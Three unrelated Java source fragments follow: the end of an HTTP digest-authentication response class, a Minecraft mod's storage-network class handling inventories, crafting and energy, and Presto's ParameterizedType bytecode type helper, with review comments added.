cnonce=\"").append(this.getCnonce()) .append("\", nc=").append(this.getNonceCount()); } tmp = this.getOpaque(); if (tmp != null) { builder.append(", opaque=\"").append(tmp).append("\""); } return builder.toString(); } public String getProperty(String key) { return this.properties.get(key); } public void setProperty(String key, String value) { this.properties.put(key, value); } // getters & setters ---------------------------------------------------------------------------------------------- public String getScheme() { return this.properties.get(DigestUtils.SCHEME); } public void setScheme(String scheme) { this.properties.put(DigestUtils.SCHEME, scheme); } public String getResponse() { return this.properties.get(DigestUtils.RESPONSE); } public void setResponse(String response) { this.properties.put(DigestUtils.RESPONSE, response); } public String getRealm() { return this.properties.get(DigestUtils.REALM); } public void setRealm(String realm) { this.properties.put(DigestUtils.REALM, realm); } public String getNonce() { return this.properties.get(DigestUtils.NONCE); } public void setNonce(String nonce) { this.properties.put(DigestUtils.NONCE, nonce); } public String getAlgorithm() { return this.properties.get(DigestUtils.ALGORITHM); } public void setAlgorithm(String algorithm) { this.properties.put(DigestUtils.ALGORITHM, algorithm); } public String getUsername() { return this.properties.get(DigestUtils.USERNAME); } public void setUsername(String username) { this.properties.put(DigestUtils.USERNAME, username); } public String getUri() { return this.properties.get(DigestUtils.URI); } public void setUri(String uri) { this.properties.put(DigestUtils.URI, uri); } public String getQop() { return this.properties.get(DigestUtils.QOP); } public void setQop(String qop) { this.properties.put(DigestUtils.QOP, qop); } public String getNonceCount() { return this.properties.get(DigestUtils.NONCE_COUNT); } public void setNonceCount(int nonceCount) { 
this.properties.put(DigestUtils.NONCE_COUNT, DigestUtils.toNonceCount(nonceCount)); } public String getCnonce() { return this.properties.get(DigestUtils.CLIENT_NONCE); } public void setCnonce(String cnonce) { this.properties.put(DigestUtils.CLIENT_NONCE, cnonce); } public String getOpaque() { return this.properties.get(DigestUtils.OPAQUE); } public void setOpaque(String opaque) { this.properties.put(DigestUtils.OPAQUE, opaque); } public Map<String, String> getProperties() { return Collections.unmodifiableMap(this.properties); } // low level overrides -------------------------------------------------------------------------------------------- @Override public String toString() { return new StringBuilder() .append("DigestAuthChallengeResponse{") .append("properties=").append(this.properties) .append('}').toString(); } }
package com.tom.storage.handler;

import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

import net.minecraft.entity.player.EntityPlayer;
import net.minecraft.nbt.NBTTagCompound;
import net.minecraft.util.math.BlockPos;
import net.minecraft.util.math.MathHelper;
import net.minecraft.util.text.ITextComponent;
import net.minecraft.util.text.Style;
import net.minecraft.util.text.TextComponentTranslation;
import net.minecraft.util.text.TextFormatting;

import com.tom.api.grid.StorageNetworkGrid;
import com.tom.api.grid.StorageNetworkGrid.IControllerTile;
import com.tom.api.grid.StorageNetworkGrid.ICraftingController;
import com.tom.api.grid.StorageNetworkGrid.IDevice;
import com.tom.api.grid.StorageNetworkGrid.IGridEnergyStorage;
import com.tom.api.grid.StorageNetworkGrid.IGridInputListener;
import com.tom.api.grid.StorageNetworkGrid.IPowerDrain;
import com.tom.api.inventory.IStorageInventory;
import com.tom.lib.api.IValidationChecker;
import com.tom.lib.api.energy.IEnergyStorage;
import com.tom.lib.api.grid.IGridDevice;
import com.tom.util.Storage;
import com.tom.util.TMLogger;
import com.tom.util.TomsModUtils;

/**
 * Aggregated state of a storage network: member inventories, crafting
 * handlers/controllers, input listeners, attached grids and named sub-networks
 * ("VPNs"). Implements {@link IEnergyStorage}; the energy methods themselves
 * (hasEnergy/extractEnergy) are outside this visible chunk.
 * NOTE(review): the class continues past the end of this chunk (it is cut off
 * at the {@code private NetworkCache} field declaration below).
 */
public class StorageData implements IEnergyStorage {
    public List<IStorageInventory> inventories = new ArrayList<>();
    protected PowerCache powerCache;
    protected List<AutoCraftingHandler.ICraftingHandler<?>> craftingHandlerList = new ArrayList<>();
    // protected Map<Location, AutoCraftingHandler.ICraftingHandler<?>>
    // craftingHandlerMap = new HashMap<>();
    protected List<ICraftingController> craftingControllerList = new ArrayList<>();
    protected List<IGridInputListener> inputListeners = new ArrayList<>();
    public List<StorageNetworkGrid> grids = new ArrayList<>();
    // Named sub-networks; keys for power-wrapped VPNs are prefixed with "." (see createPowerWrappedVPN).
    protected Map<String, Storage<StorageData>> networks = new HashMap<>();
    // private StorageSystemProperties properties = new
    // DefaultStorageSystemProperties();
    protected boolean isVPN = false, isRealVPN = false;
    // private int bootTime = 20;

    // Initializes the power cache and the network cache ('cache' is declared in the
    // truncated tail of this class).
    public StorageData() {
        powerCache = new PowerCache();
        cache = CacheRegistry.createNetworkCache(this);
    }

    // Looks up a named sub-network; real VPNs never resolve nested VPNs.
    public Storage<StorageData> getVPN(String name) {
        return !isRealVPN ? networks.get(name) : null;
    }

    /**
     * Returns the sub-network registered under "." + nameIn, creating a fresh
     * VPN-flagged StorageData for it on first use.
     * NOTE(review): the {@code power} parameter is never used in this body —
     * confirm whether the power cache was meant to be attached to the new network.
     */
    public Storage<StorageData> createPowerWrappedVPN(String nameIn, PowerCache power) {
        String name = "." + nameIn;
        if (networks.containsKey(name)) {
            return networks.get(name);
        } else {
            StorageData d = new StorageData();
            d.isVPN = true;
            Storage<StorageData> s = new Storage<>(d);
            networks.put(name, s);
            return s;
        }
    }

    /**
     * Facade inventory over all member inventories. Every operation first checks
     * (and for push/pull, bills) network energy via hasEnergy()/extractEnergy().
     */
    public IStorageInventory storageInv = new IStorageInventory() {
        // Routes an incoming stack through crafting controllers and input listeners
        // (either may consume or transform it), then distributes the remainder.
        // Costs a flat 0.1 energy; returns the untouched stack when energy is short.
        @Override
        public <T extends ICraftable> T pushStack(T stack) {
            if (stack == null || !stack.hasQuantity())
                return null;
            if (hasEnergy() && extractEnergy(0.1D, false) == 0.1D) {
                for (int i = 0;i < craftingControllerList.size();i++) {
                    if (craftingControllerList.get(i) != null) {
                        stack = craftingControllerList.get(i).onStackInput(stack);
                    } else {
                        TMLogger.bigWarn("Crafting Controller List Contains a ~~NULL~~ instance!!! This SHOULDN'T BE POSSIBLE!");
                    }
                    if (stack == null)
                        return null;
                }
                for (int i = 0;i < inputListeners.size();i++) {
                    if (inputListeners.get(i) != null) {
                        stack = inputListeners.get(i).onStackInput(stack);
                    } else {
                        TMLogger.bigWarn("Input Listener List Contains a ~~NULL~~ instance!!! This SHOULDN'T BE POSSIBLE!");
                    }
                    if (stack == null)
                        return null;
                }
                return pushStack0(stack);
            } else
                return stack;
        }

        // Offers the stack to each member inventory in order until fully stored.
        private <T extends ICraftable> T pushStack0(T stack) {
            for (int i = 0;i < inventories.size();i++) {
                stack = inventories.get(i).pushStack(stack);
                if (stack == null || !stack.hasQuantity())
                    return null;
            }
            return stack;
        }

        // Extracts up to min(requested, max, one stack) of the matching stack,
        // accumulating across member inventories. Each extraction is limited by
        // the energy that can actually be drained (simulated first, then applied);
        // the per-item cost scales inversely with the item's max stack size.
        @Override
        public <T extends ICraftable> T pullStack(T stack, long max) {
            if (hasEnergy()) {
                if (stack == null)
                    return null;
                T retStack = null;
                for (int i = 0;i < inventories.size();i++) {
                    List<T> stacks = inventories.get(i).getStacks(CacheRegistry.getCacheClassFor(stack));
                    for (int j = 0;j < stacks.size();j++) {
                        if (stack.isEqual(stacks.get(j))) {
                            // System.out.println("pull");
                            if (retStack == null) {
                                long maxExtractable = Math.min(Math.min(stack.getQuantity(), max), stack.getMaxStackSize());
                                long stackSizeMultipier = 64 / stack.getMaxStackSize();
                                double energyExtracted = extractEnergy((stackSizeMultipier / 10D) * maxExtractable, true);
                                double d1 = energyExtracted / (stackSizeMultipier / 10D);
                                maxExtractable = Math.min(maxExtractable, MathHelper.floor(d1));
                                if (maxExtractable == 0)
                                    return null;
                                extractEnergy(energyExtracted, false);
                                retStack = inventories.get(i).pullStack(stack, maxExtractable);
                            } else {
                                // Subsequent inventories only top up the remainder.
                                long maxExtractable = Math.min(Math.min(stack.getQuantity(), max), stack.getMaxStackSize()) - retStack.getQuantity();
                                long stackSizeMultipier = 64 / stack.getMaxStackSize();
                                double energyExtracted = extractEnergy((stackSizeMultipier / 10D) * maxExtractable, true);
                                double d1 = energyExtracted / (stackSizeMultipier / 10D);
                                maxExtractable = Math.min(maxExtractable, MathHelper.floor(d1));
                                if (maxExtractable == 0)
                                    return null;
                                extractEnergy(energyExtracted, false);
                                T c = inventories.get(i).pullStack(stack, maxExtractable);
                                if (c != null)
                                    retStack.add(c);
                            }
                            if (retStack != null && retStack.getQuantity() == Math.min(Math.min(stack.getQuantity(), max), stack.getMaxStackSize()))
                                return retStack;
                        }
                    }
                }
                return retStack;
            } else
                return null;
        }

        @Override
        public int getPriority() {
            return 0;
        }

        // Merged view of all stored stacks: copies from every member inventory,
        // combining equal stacks by adding their quantities. Empty without energy.
        @SuppressWarnings("unchecked")
        @Override
        public <T extends ICraftable, C extends ICache<T>> List<T> getStacks(Class<C> cache) {
            List<T> list = new ArrayList<>();
            if (hasEnergy()) {
                for (int i = 0;i < inventories.size();i++) {
                    IStorageInventory inv = inventories.get(i);
                    List<T> stacks = inv.getStacks(cache);
                    for (int j = 0;j < stacks.size();j++) {
                        T stack = stacks.get(j);
                        if (stack != null) {
                            stack = (T) stack.copy();
                            boolean added = false;
                            for (int k = 0;k < list.size();k++) {
                                if (list.get(k).equals(stack)) {
                                    list.get(k).add(stack);
                                    added = true;
                                    break;
                                }
                            }
                            if (!added)
                                list.add(stack);
                        }
                    }
                }
            }
            // list.sort(comparator);
            return list;
        }

        // De-duplicated list of every output producible by the crafting handlers
        // registered for the given cache class. Empty without energy.
        @SuppressWarnings("unchecked")
        @Override
        public <T extends ICraftable, C extends ICache<T>> List<T> getCraftableStacks(Class<C> cache) {
            List<T> list = new ArrayList<>();
            if (hasEnergy()) {
                for (int i = 0;i < craftingHandlerList.size();i++) {
                    AutoCraftingHandler.ICraftingHandler<?> handler = craftingHandlerList.get(i);
                    if (handler.getCraftableCacheClass() == cache) {
                        AutoCraftingHandler.ICraftingHandler<T> handler2 = (AutoCraftingHandler.ICraftingHandler<T>) handler;
                        List<AutoCraftingHandler.ICraftingRecipe<T>> recipes = handler2.getRecipes();
                        for (int j = 0;j < recipes.size();j++) {
                            List<T> outputStacks = recipes.get(j).getOutputs();
                            for (int k = 0;k < outputStacks.size();k++) {
                                T ss = outputStacks.get(k);
                                if (ss != null) {
                                    boolean found = false;
                                    ss = (T) ss.copy();
                                    for (int l = 0;l < list.size();l++) {
                                        T stack = list.get(l);
                                        if (stack.isEqual(ss)) {
                                            found = true;
                                            break;
                                        }
                                    }
                                    if (!found)
                                        list.add((T) ss.copy());
                                }
                            }
                        }
                    }
                }
            }
            return list;
        }

        @Override
        public StorageNetworkGrid getGrid() {
            return null;
        }

        @Override
        public long getStorageValue() {
            return inventories.stream().mapToLong(IStorageInventory::getStorageValue).sum();
        }

        // Validity flag for this facade; cleared on saveAndInvalidate().
        boolean valid = true;

        @Override
        public void saveAndInvalidate() {
            save();
            valid = false;
        }

        @Override
        public boolean isValid() {
            return valid;
        }
    };

    // NOTE(review): the class continues beyond this chunk; this declaration is truncated.
    private NetworkCache
cache; // continuation of the NetworkCache field declared at the end of the previous chunk line

// Devices participating in this network, grouped by role.
public List<IGridDevice<?>> devices = new ArrayList<>();
public List<IPowerDrain> powerDrain = new ArrayList<>();
public List<IDevice> channelDevices = new ArrayList<>();
public List<IControllerTile> controllers = new ArrayList<>();
public NetworkState networkState = NetworkState.ACTIVE;

/** Persists only the power cache; everything else is re-registered at runtime. */
public void writeToNBT(NBTTagCompound tag) {
	powerCache.writeToNBT(tag);
}

public void readFromNBT(NBTTagCompound tag) {
	powerCache.readFromNBT(tag);
}

/** Registers an inventory (at most once) and re-sorts the list by priority. */
public void addInventory(IStorageInventory inventory) {
	if (!inventories.contains(inventory)) {
		inventories.add(inventory);
		Collections.sort(inventories, com.tom.api.grid.StorageNetworkGrid.PRIORITY_COMP);
	}
}

/* NOTE(review): a large commented-out legacy IInventory implementation (getSizeInventory,
 * getStackInSlot, decrStackSize, removeStackFromSlot, setInventorySlotContents, markDirty,
 * open/closeInventory, clear, getName, getField* etc., all dispatching by global slot index
 * across 'inventories') used to live here; it was superseded by the IStorageInventory
 * aggregate above and can be recovered from version control if ever needed. */

/** Unregisters an inventory and re-sorts the remainder by priority. */
public void removeInventory(IStorageInventory inventory) {
	if (inventories.contains(inventory)) {
		inventories.remove(inventory);
		Collections.sort(inventories, com.tom.api.grid.StorageNetworkGrid.PRIORITY_COMP);
	}
}

/** Registers a crafting handler (at most once) and keeps the list priority-sorted. */
public void addCraftingHandler(AutoCraftingHandler.ICraftingHandler<? extends ICraftable> data) {
	if (!craftingHandlerList.contains(data)) {
		craftingHandlerList.add(data);
		// craftingHandlerMap.put(new Location(data.getPos2(),
		// data.getDim(), data.getExtraData()), data);
		Collections.sort(craftingHandlerList, com.tom.api.grid.StorageNetworkGrid.PRIORITY_COMP);
	}
}

/** Unregisters a crafting handler and re-sorts the remainder by priority. */
public void removeCraftingHandler(AutoCraftingHandler.ICraftingHandler<? extends ICraftable> data) {
	if (craftingHandlerList.contains(data)) {
		craftingHandlerList.remove(data);
		// craftingHandlerMap.remove(new Location(data.getPos2(),
		// data.getDim(), data.getExtraData()));
		Collections.sort(craftingHandlerList, com.tom.api.grid.StorageNetworkGrid.PRIORITY_COMP);
	}
}

/**
 * Gathers every recipe from all registered handlers and asks AutoCraftingHandler to
 * plan a crafting job for the requested stack against a snapshot of current storage.
 *
 * @throws AutoCraftingHandler.TooComplexCraftingException when planning exceeds its limits
 */
public AutoCraftingHandler.CalculatedCrafting calculateCrafting(ICraftable stackToCraft) throws AutoCraftingHandler.TooComplexCraftingException {
	List<AutoCraftingHandler.ICraftingRecipe<? extends ICraftable>> recipes = new ArrayList<>();
	for (int i = 0;i < craftingHandlerList.size();i++) {
		recipes.addAll(craftingHandlerList.get(i).getRecipes());
	}
	return AutoCraftingHandler.calculateCrafting(recipes, stackToCraft, cache.createStored());
}

public void addCraftingController(ICraftingController data) {
	if (!craftingControllerList.contains(data)) {
		craftingControllerList.add(data);
	}
	// addInputListener(data);
}

public void removeCraftingController(ICraftingController data) {
	if (craftingControllerList.contains(data)) {
		craftingControllerList.remove(data);
	}
	// removeInputListener(data);
}

public void addInputListener(IGridInputListener data) {
	if (!inputListeners.contains(data)) {
		inputListeners.add(data);
	}
}

// NOTE(review): asymmetric with addInputListener, which accepts any IGridInputListener;
// confirm this narrower ICraftingController parameter type is intentional.
public void removeInputListener(ICraftingController data) {
	if (inputListeners.contains(data)) {
		inputListeners.remove(data);
	}
}
/**
 * Plans and queues a crafting job for the given stack.
 * Fails (with a chat message to the requesting player, if any) when ingredients are
 * missing or no crafting controller has the free memory/operations for the job.
 *
 * NOTE(review): cpuId is currently unused — jobs go to the first idle controller that fits.
 */
public void queueCrafting(ICraftable stackToCraft, EntityPlayer queuedBy, int cpuId) {
	try {
		AutoCraftingHandler.CalculatedCrafting crafting = calculateCrafting(stackToCraft);
		// NOTE(review): containsAll is never set to false any more (the code that did so
		// is gone), so only empty recipes / non-empty missingStacks can fail the check below.
		boolean containsAll = true;
		List<ICraftable> missingStacks = new ArrayList<>();
		NetworkCache cache = this.cache.createStored();
		for (int i = 0;i < crafting.requiredStacks.size();i++) {
			ICraftable stack = crafting.requiredStacks.get(i);
			// Each required stack records what is unavailable into missingStacks.
			stack.checkIfIngredientsAreAvailable(cache, missingStacks, crafting);
		}
		if (crafting.recipesToCraft.isEmpty() || !containsAll || !missingStacks.isEmpty()) {
			if (queuedBy != null)
				TomsModUtils.sendNoSpamTranslate(queuedBy, new Style().setColor(TextFormatting.RED), "tomsMod.chat.craftFail", new TextComponentTranslation("tomsMod.missingItems"));
			return;
		}
		if (queuedBy != null)
			crafting.queuedBy = queuedBy.getName();
		// Hand the job to the first idle controller with enough memory and operations
		// (maxMemory == -1 means unlimited).
		for (int i = 0;i < craftingControllerList.size();i++) {
			ICraftingController cont = craftingControllerList.get(i);
			int maxMemory = cont.getMaxMemory();
			if (!cont.hasJob() && ((maxMemory >= crafting.memorySize && cont.getMaxOperations() >= crafting.operationCount) || maxMemory == -1)) {
				cont.queueCrafing(crafting);
				int secTime = MathHelper.ceil(crafting.time / 20D); // ticks -> seconds (20 ticks/s)
				ITextComponent c = crafting.mainStack.serializeTextComponent(TextFormatting.GREEN);
				if (queuedBy != null)
					TomsModUtils.sendChatTranslate(queuedBy, new Style().setColor(TextFormatting.GREEN), "tomsMod.chat.craftingStarted", c, secTime / 60, secTime % 60);
				return;
			}
		}
		if (queuedBy != null)
			TomsModUtils.sendNoSpamTranslate(queuedBy, new Style().setColor(TextFormatting.RED), "tomsMod.chat.craftFail", new TextComponentTranslation("tomsMod.notEnoughCPUsOrMemory"));
	} catch (Throwable e) {
		// NOTE(review): catching Throwable hides planner bugs behind a chat message;
		// consider narrowing this to the expected exception types.
		if (queuedBy != null)
			TomsModUtils.sendNoSpamTranslate(queuedBy, new Style().setColor(TextFormatting.RED), "tomsMod.chat.craftFail", new TextComponentTranslation(e.getMessage()));
	}
}

// public void update(){
// if(bootTime > 0)bootTime--;
// if(bootTime < 0)bootTime = 0;
// }

/**
 * Builds the client-facing summary of a planned crafting job: which controller slots
 * could accept it, the serialized plan, and NBT for each missing ingredient.
 */
public AutoCraftingHandler.CompiledCalculatedCrafting compileCalculatedCrafting(AutoCraftingHandler.CalculatedCrafting crafting) {
	AutoCraftingHandler.CompiledCalculatedCrafting c = new AutoCraftingHandler.CompiledCalculatedCrafting();
	for (int i = 0;i < craftingControllerList.size();i++) {
		ICraftingController cont = craftingControllerList.get(i);
		int maxMemory = cont.getMaxMemory();
		if (!cont.hasJob() && ((maxMemory >= crafting.memorySize && cont.getMaxOperations() >= crafting.operationCount) || maxMemory == -1)) {
			// Append this controller's index to the fixed-size cpu id array.
			short[] cpus = new short[c.cpus.length + 1];
			System.arraycopy(c.cpus, 0, cpus, 0, c.cpus.length);
			cpus[c.cpus.length] = (short) i;
			c.cpus = cpus;
		}
	}
	NetworkCache cache = this.cache.createStored();
	List<ICraftable> missingStacks = new ArrayList<>();
	for (int i = 0;i < crafting.requiredStacks.size();i++) {
		ICraftable stack = crafting.requiredStacks.get(i);
		stack.checkIfIngredientsAreAvailable(cache, missingStacks, crafting);
	}
	crafting.writeToClientNBTPacket(c);
	// Merge equal missing stacks before serializing them.
	List<ICraftable> missingStacksO = new ArrayList<>();
	for (ICraftable s : missingStacks) {
		AutoCraftingHandler.addCraftableToList(s, missingStacksO);
	}
	for (ICraftable s : missingStacksO) {
		NBTTagCompound t = new NBTTagCompound();
		CacheRegistry.writeToNBT(s, t);
		c.missingStacks.add(t);
	}
	return c;
}

/** Returns the index of the given controller in the controller list, or -1 if absent. */
public int getCpuID(ICraftingController c) {
	for (int i = 0;i < craftingControllerList.size();i++) {
		ICraftingController o = craftingControllerList.get(i);
		if (o == c) {
			return i;
		}
	}
	return -1;
}

// Tick counter used to rate-limit the validity sweeps in update().
private int counter;

/**
 * Per-tick upkeep: charges every power drain (switching consumers off when energy
 * runs out), drops invalidated drains, and periodically purges invalidated members
 * from all registration lists.
 */
public void update() {
	counter++;
	boolean outOfPower = !networkState.isPowered();
	List<IPowerDrain> invalid = new ArrayList<>();
	boolean foundInvalid = false;
	for (int i = 0;i < powerDrain.size();i++) {
		IPowerDrain dr = powerDrain.get(i);
		if (!dr.isValid()) {
			invalid.add(dr);
			foundInvalid = true;
			continue;
		}
		if (outOfPower) {
			dr.setActive(NetworkState.OFF);
		} else {
			double drain = dr.getPowerDrained();
			double e = this.extractEnergy(drain, false);
			if (e == drain) {
				// powerDrain.get(i).setActive(networkState);
			} else {
				// powerDrain.get(i).setActive(NetworkState.OFF);
				outOfPower = true; // partial payment: treat the rest of this tick as unpowered
			}
		}
	}
	if (foundInvalid)
		powerDrain.removeAll(invalid);
	powerCache.setActive(!outOfPower);
	IValidationChecker.removeAllInvalid(inventories);
	// Cheaper validity sweeps only every 5th tick.
	if(counter % 5 == 0){
		IValidationChecker.removeAllInvalid(craftingControllerList);
		IValidationChecker.removeAllInvalid(craftingHandlerList);
		IValidationChecker.removeAllInvalid(devices);
		IValidationChecker.removeAllInvalid(channelDevices);
		IValidationChecker.removeAllInvalid(controllers);
		IValidationChecker.removeAllInvalid(inputListeners);
	}
}

/** Detaches a grid from this shared network data. */
public void invalidate(StorageNetworkGrid grid) {
	grids.remove(grid);
}
public NetworkState isActive() { return networkState; } public void setActive(NetworkState state) { this.networkState = state; } public void addEnergyStorage(IGridEnergyStorage storage) { powerCache.addEnergyStorage(storage); } public void removeEnergyStorage(IGridEnergyStorage storage) { powerCache.removeEnergyStorage(storage); } @Override public double receiveEnergy(double maxReceive, boolean simulate) { return powerCache.receiveEnergy(maxReceive, simulate); } @Override public double extractEnergy(double maxExtract, boolean simulate) { return powerCache.extractEnergy(maxExtract, simulate); } @Override public double getEnergyStored() { return powerCache.getEnergyStored(); } @Override public long getMaxEnergyStored() { return powerCache.getMaxEnergyStored(); } @Override public boolean isFull() { return powerCache.isFull(); } @Override public boolean hasEnergy() { return powerCache.hasEnergy(); } @Override public double getMaxExtract() { return powerCache.getMaxExtract(); } @Override public double getMaxReceive() { return powerCache.getMaxReceive(); } public PowerCache getPowerCache() { return powerCache; } public void setPowerCache(PowerCache powerCache) { this.powerCache = powerCache; } public boolean isFullyActive() { return hasEnergy() && networkState.fullyActive(); } public boolean showChannels() { return hasEnergy() && networkState.showChannels(); } public BlockPos getSecurityStationPos() { return controllers.size() > 0 ? controllers.get(0).getSecurityStationPos() : null; } /*public ICraftingHandler<?> getCraftingHandler(BlockPos pos, int dim, int extra){ return craftingHandlerMap.get(new Location(pos, dim, extra)); }*/ }
/*
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package com.facebook.presto.byteCode;

import com.google.common.base.Function;
import com.google.common.base.Preconditions;
import com.google.common.base.Predicate;
import com.google.common.collect.ImmutableList;
import org.objectweb.asm.Type;

import javax.annotation.Nullable;
import javax.annotation.concurrent.Immutable;

import java.util.List;

/**
 * A (possibly generic) JVM type used by the bytecode generator.
 * <p>
 * Internally keeps three representations:
 * <ul>
 *   <li>{@code className} — the JVM internal (path) name, e.g. {@code java/lang/String}</li>
 *   <li>{@code type} — the JVM type descriptor, e.g. {@code Ljava/lang/String;} or {@code [I}</li>
 *   <li>{@code parameters} — descriptors/signatures of the generic type arguments (empty when raw)</li>
 * </ul>
 * Equality and hashing are based solely on the erased descriptor ({@code type});
 * generic parameters are only reflected in {@link #getGenericSignature()}.
 */
@Immutable
public class ParameterizedType
{
    /**
     * Creates a type from a Java-style dotted class name, e.g. {@code java.lang.String}.
     *
     * @throws IllegalArgumentException if the name ends with {@code ";"} (a descriptor,
     *         not a class name) or with {@code "/"}.
     *         (Fix: the previous guard — "if it ends with '/', check it does not end
     *         with ';'" — could never fire since a name cannot end with both, so no
     *         trailing-slash validation actually happened.)
     */
    public static ParameterizedType typeFromJavaClassName(String className)
    {
        Preconditions.checkNotNull(className, "type is null");
        Preconditions.checkArgument(!className.endsWith(";"), "Invalid class name %s", className);
        Preconditions.checkArgument(!className.endsWith("/"), "Invalid class name %s", className);
        return new ParameterizedType(className.replace('.', '/'));
    }

    /**
     * Creates a type from a JVM internal (path) name, e.g. {@code java/lang/String}.
     *
     * @throws IllegalArgumentException if the name ends with {@code ";"}.
     *         (Behavior-equivalent simplification: the old code only checked names
     *         containing a dot, but the constructor rejected any trailing {@code ";"}
     *         with the same exception and message anyway.)
     */
    public static ParameterizedType typeFromPathName(String className)
    {
        Preconditions.checkNotNull(className, "type is null");
        Preconditions.checkArgument(!className.endsWith(";"), "Invalid class name %s", className);
        return new ParameterizedType(className);
    }

    /** Creates a raw type from an ASM {@link Type} (uses its internal name). */
    public static ParameterizedType type(Type type)
    {
        Preconditions.checkNotNull(type, "type is null");
        return new ParameterizedType(type.getInternalName());
    }

    /** Creates a raw type from a Java {@link Class}. */
    public static ParameterizedType type(Class<?> type)
    {
        Preconditions.checkNotNull(type, "type is null");
        return new ParameterizedType(type);
    }

    /** Creates a generic type with the given class type arguments, e.g. {@code List<String>}. */
    public static ParameterizedType type(Class<?> type, Class<?>... parameters)
    {
        Preconditions.checkNotNull(type, "type is null");
        return new ParameterizedType(type, parameters);
    }

    /** Creates a generic type whose type arguments are themselves parameterized types. */
    public static ParameterizedType type(Class<?> type, ParameterizedType... parameters)
    {
        Preconditions.checkNotNull(type, "type is null");
        return new ParameterizedType(type, parameters);
    }

    private final String type;          // JVM type descriptor, e.g. "Ljava/lang/String;"
    private final String className;     // JVM internal name, e.g. "java/lang/String"
    private final List<String> parameters;  // generic argument signatures (empty when raw)

    /**
     * Creates a raw type from a JVM internal (path) name.
     *
     * @throws IllegalArgumentException if {@code className} ends with {@code ";"}.
     *         (Fix: the original validation was a pair of redundant guarded checks —
     *         including the tautology "if it ends with ';', assert it doesn't" —
     *         which collapse to this single unconditional check with identical
     *         observable behavior.)
     */
    public ParameterizedType(String className)
    {
        Preconditions.checkNotNull(className, "className is null");
        Preconditions.checkArgument(!className.endsWith(";"), "Invalid class name %s", className);
        this.className = className;
        this.type = "L" + className + ";";
        this.parameters = ImmutableList.of();
    }

    private ParameterizedType(Class<?> type)
    {
        Preconditions.checkNotNull(type, "type is null");
        this.type = toInternalIdentifier(type);
        this.className = getPathName(type);
        this.parameters = ImmutableList.of();
    }

    private ParameterizedType(Class<?> type, Class<?>... parameters)
    {
        Preconditions.checkNotNull(type, "type is null");
        this.type = toInternalIdentifier(type);
        this.className = getPathName(type);
        ImmutableList.Builder<String> builder = ImmutableList.builder();
        for (Class<?> parameter : parameters) {
            builder.add(toInternalIdentifier(parameter));
        }
        this.parameters = builder.build();
    }

    private ParameterizedType(Class<?> type, ParameterizedType... parameters)
    {
        Preconditions.checkNotNull(type, "type is null");
        this.type = toInternalIdentifier(type);
        this.className = getPathName(type);
        ImmutableList.Builder<String> builder = ImmutableList.builder();
        for (ParameterizedType parameter : parameters) {
            // toString() yields the generic signature, allowing nested generics
            builder.add(parameter.toString());
        }
        this.parameters = builder.build();
    }

    /** JVM internal name, e.g. {@code java/lang/String}. */
    public String getClassName()
    {
        return className;
    }

    /** Java-style dotted name, e.g. {@code java.lang.String}. */
    public String getJavaClassName()
    {
        return className.replace('/', '.');
    }

    /** JVM type descriptor, e.g. {@code Ljava/lang/String;}. */
    public String getType()
    {
        return type;
    }

    /** ASM object type for this class's internal name. */
    public Type getAsmType()
    {
        return Type.getObjectType(className);
    }

    /**
     * JVM generic signature, e.g. {@code Ljava/util/List<Ljava/lang/String;>;}.
     * Falls back to the plain descriptor shape when the type is raw.
     */
    public String getGenericSignature()
    {
        final StringBuilder sb = new StringBuilder();
        sb.append('L').append(className);
        if (!parameters.isEmpty()) {
            sb.append("<");
            for (String parameterType : parameters) {
                sb.append(parameterType);
            }
            sb.append(">");
        }
        sb.append(";");
        return sb.toString();
    }

    public boolean isGeneric()
    {
        return !parameters.isEmpty();
    }

    @Override
    public boolean equals(Object o)
    {
        if (this == o) {
            return true;
        }
        if (o == null || getClass() != o.getClass()) {
            return false;
        }
        ParameterizedType that = (ParameterizedType) o;
        // Equality intentionally ignores generic parameters (erasure semantics).
        return type.equals(that.type);
    }

    @Override
    public int hashCode()
    {
        return type.hashCode();
    }

    @Override
    public String toString()
    {
        return getGenericSignature();
    }

    /** Converts a class's dotted name to its JVM internal (slash-separated) name. */
    public static String getPathName(Class<?> n)
    {
        return n.getName().replace('.', '/');
    }

    /** Builds the JVM type descriptor for a class, handling primitives and arrays. */
    private static String toInternalIdentifier(Class<?> n)
    {
        if (n.isArray()) {
            n = n.getComponentType();
            if (n.isPrimitive()) {
                if (n == Byte.TYPE) {
                    return "[B";
                }
                else if (n == Boolean.TYPE) {
                    return "[Z";
                }
                else if (n == Short.TYPE) {
                    return "[S";
                }
                else if (n == Character.TYPE) {
                    return "[C";
                }
                else if (n == Integer.TYPE) {
                    return "[I";
                }
                else if (n == Float.TYPE) {
                    return "[F";
                }
                else if (n == Double.TYPE) {
                    return "[D";
                }
                else if (n == Long.TYPE) {
                    return "[J";
                }
                else {
                    throw new RuntimeException("Unrecognized type in compiler: " + n.getName());
                }
            }
            else {
                return "[" + toInternalIdentifier(n);
            }
        }
        else {
            if (n.isPrimitive()) {
                if (n == Byte.TYPE) {
                    return "B";
                }
                else if (n == Boolean.TYPE) {
                    return "Z";
                }
                else if (n == Short.TYPE) {
                    return "S";
                }
                else if (n == Character.TYPE) {
                    return "C";
                }
                else if (n == Integer.TYPE) {
                    return "I";
                }
                else if (n == Float.TYPE) {
                    return "F";
                }
                else if (n == Double.TYPE) {
                    return "D";
                }
                else if (n == Long.TYPE) {
                    return "J";
                }
                else if (n == Void.TYPE) {
                    return "V";
                }
                else {
                    throw new RuntimeException("Unrecognized type in compiler: " + n.getName());
                }
            }
            else {
                return "L" + getPathName(n) + ";";
            }
        }
    }

    /** Guava predicate selecting generic types. */
    public static Predicate<ParameterizedType> isGenericType()
    {
        return new Predicate<ParameterizedType>()
        {
            @Override
            public boolean apply(ParameterizedType input)
            {
                return input.isGeneric();
            }
        };
    }

    /** Guava function extracting a type's descriptor string. */
    public static Function<ParameterizedType, String> getParameterType()
    {
        return new Function<ParameterizedType, String>()
        {
            @Override
            public String apply(ParameterizedType input)
            {
                return input.getType();
            }
        };
    }

    /** Guava function wrapping a {@link Class} as a raw {@link ParameterizedType}. */
